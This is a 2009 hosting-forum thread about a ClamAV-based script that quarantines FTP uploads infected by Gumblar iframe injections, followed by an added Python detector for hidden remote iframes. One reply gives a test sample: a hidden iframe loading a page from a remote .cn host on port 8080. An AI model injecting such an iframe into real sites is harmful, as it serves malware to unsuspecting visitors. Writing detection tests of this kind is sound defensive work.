The Community Forums


SOLUTION for Gumblar/IFRAME/JS hacks with stolen FTP Passwords...

Discussion in 'Security' started by hidonet, Aug 7, 2009.

  1. hidonet

    hidonet Well-Known Member

    Joined:
    Apr 29, 2005
    Messages:
    55
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Istanbul / Turkey
    I can add if you want.

    Please send me the content of the file. Please make a zip and send it to hidonet [at] oxio.net
     
  2. Voltio

    Voltio Active Member

    Joined:
    Oct 17, 2004
    Messages:
    32
    Likes Received:
    0
    Trophy Points:
    156
    This script seems very interesting and useful, for some reason it does not work on my server :(... I will keep trying to get it to work..
     
  3. hidonet

    hidonet Well-Known Member

    If your server is Linux/cPanel/pure-ftpd, the script can work. If you are getting errors, please tell me. I can help you fix these problems..
     
  4. wthrees

    wthrees Registered

    Joined:
    May 4, 2005
    Messages:
    4
    Likes Received:
    0
    Trophy Points:
    151
    Hi great work !!
    I honestly appreciate what you have made for the community.

    I would like to request 2 things to enhance the features:

    1. I have two servers and get the alerts on the same email address for both the servers. Can you add the server hostname in the email subject? like:

    Gumblar Attack !!! user : trafficn on [HostNameHere]

    2. When the files are quarantined, it's a very logical and good idea to move the files to directories with the username.
    I'd request you add the username dir so the file is moved to the relevant user folder. like:

    /quarantine/clamav/UserNameHere/infectedfile.ext


    Thanks and hope these can be implemented in the next update.
     
  5. hidonet

    hidonet Well-Known Member

    Ok I will do these requests in next release ( soon )...
     
  6. wthrees

    wthrees Registered

    When should I be back to check the update?
     
  7. hidonet

    hidonet Well-Known Member

    I think in 1-2 days...
     
  8. luisp

    luisp Well-Known Member
    PartnerNOC

    Joined:
    Jan 17, 2003
    Messages:
    57
    Likes Received:
    0
    Trophy Points:
    156
    Location:
    Portugal
    cPanel Access Level:
    DataCenter Provider
    Hello,

    First, congrats on your great script. I think we all could donate something to support this great work.

    Any idea on the hostname option in subject? I have a few servers, and this option would be very important.

    thanks
     
  9. hidonet

    hidonet Well-Known Member

    Ok I will add..
     
  10. mambovince

    mambovince Well-Known Member

    Joined:
    Jan 15, 2005
    Messages:
    192
    Likes Received:
    0
    Trophy Points:
    166
    Location:
    London, UK
    Hi,
    Firstly I also want to thank you for your time on this.

    I haven't tried it yet, but can you let us know how it compares to the CSX offering from Configserver.com please?

    Would it also be pointless to have both?

    Best regards,

    - Vince
     
  11. hidonet

    hidonet Well-Known Member

    Hi,

    This script just scans files uploaded with pure-ftp. It is not suitable for scanning PHP, Perl or other script-based uploads...
     
  12. 9xlinux

    9xlinux Well-Known Member

    Joined:
    Dec 20, 2009
    Messages:
    185
    Likes Received:
    0
    Trophy Points:
    66
    cPanel Access Level:
    Root Administrator
    I have installed by following Installation » Anti-Gumblar
    I have tried to upload an IFrame-infected file.
    But I think this script is not working for me.
    I have restarted pure-ftp many times via /etc/init.d/pure-ftpd restart
    But it is still not working.
     
  13. hidonet

    hidonet Well-Known Member

    Please send me your sample file..
     
  14. 9xlinux

    9xlinux Well-Known Member

    I followed the error log file in the same folder and found that some comments in the ftp_clamscan_config.php file were not on one line, so the second line was not commented.
    Due to this the script was showing an error.
    I commented out the second line and now the script is working fine.
    Thanks for a great script.
     
  15. 9xlinux

    9xlinux Well-Known Member

    Very nice script, but it uses too much CPU at the time of scanning.
    My server load increases 2 times once someone uploads a file via FTP.
     
  16. nitaish

    nitaish Well-Known Member
    PartnerNOC

    Joined:
    Jan 6, 2006
    Messages:
    129
    Likes Received:
    1
    Trophy Points:
    168
    Location:
    Mulund, India, India
    Instead of quarantine, the script should simply remove the iframe code which has been injected and block the IP from which the injection was done. This would make more sense.
     
  17. hidonet

    hidonet Well-Known Member

    Removing code is a dangerous thing.
     
  18. noimad1

    noimad1 Well-Known Member

    Joined:
    Mar 27, 2003
    Messages:
    627
    Likes Received:
    0
    Trophy Points:
    166
    Sorry to open an old thread, but I've successfully installed this on 5 servers, but I have two servers that it just doesn't want to work on.

    On those servers, the install appears to go ok, and the restart of pure-ftpd through ssh seems to work fine. I see this from my ps output:

    root 7935 0.0 0.0 7616 260 ? Ss 15:21 0:00 /usr/sbin/pure-uploadscript -B -r /root/ftp_clamscan.php
    root 8268 0.0 6.4 156940 133632 ? Ssl 16:54 0:00 /usr/local/sbin/clamd


    But when I upload a file nothing happens. No quarantine, no log in the log file, no e-mail?

    Is there a checklist of things I should try maybe?
     
  19. Voltio

    Voltio Active Member

    How to test it?

    How can I test it? I've installed it, but how can I make sure it works? I uploaded a .php file with the following lines:

    iframe
    http://
    :8080
     
  20. noimad1

    noimad1 Well-Known Member

    Create a file with this in it:

    Code:
    <iframe src="http://gianthighest.cn:8080/index.php" width=171 height=190 style="visibility: hidden"></iframe>
     
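An added example, not part of the thread and not hidonet's script (which scans uploads with ClamAV): a standalone heuristic that flags hidden remote iframes of the shape posted above, together with the per-user quarantine path and hostname-tagged subject that were requested earlier in the thread. All function names and the placeholder host are assumptions made for illustration.

```python
import os
import re
import socket
from html.parser import HTMLParser
from urllib.parse import urlsplit

QUARANTINE_ROOT = "/quarantine/clamav"  # base path taken from the thread
# Constructed sample, same shape as the test line posted above (placeholder host).
SAMPLE = '<iframe src="http://bad.example:8080/index.php" width=171 height=190 style="visibility: hidden"></iframe>'

class _IframeCollector(HTMLParser):
    """Collect the attributes of every <iframe> start tag."""
    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append({k: (v or "") for k, v in attrs})

def _is_hidden(attrs):
    style = attrs.get("style", "").lower().replace(" ", "")
    tiny = attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1")
    return "visibility:hidden" in style or "display:none" in style or tiny

def suspicious_iframes(text):
    """Return the src of each hidden iframe that loads from a remote host."""
    parser = _IframeCollector()
    parser.feed(text)
    parser.close()
    hits = []
    for attrs in parser.iframes:
        try:
            url = urlsplit(attrs.get("src", ""))
        except ValueError:  # malformed URL: skip rather than crash the scan
            continue
        if url.scheme in ("http", "https") and url.hostname and _is_hidden(attrs):
            hits.append(attrs["src"])
    return hits

def quarantine_path(user, uploaded_file):
    """Per-user quarantine target; sanitising blocks path traversal."""
    safe_user = re.sub(r"[^A-Za-z0-9_-]", "_", user) or "unknown"
    return os.path.join(QUARANTINE_ROOT, safe_user, os.path.basename(uploaded_file))

def alert_subject(user, hostname=None):
    """Mail subject that names the server, for admins with several hosts."""
    return "Gumblar Attack !!! user : %s on [%s]" % (user, hostname or socket.gethostname())
```

When a script is run by pure-uploadscript, the uploaded file's path arrives as its first argument and the account name in the UPLOAD_USER environment variable, so those two values can feed `quarantine_path` and `alert_subject`.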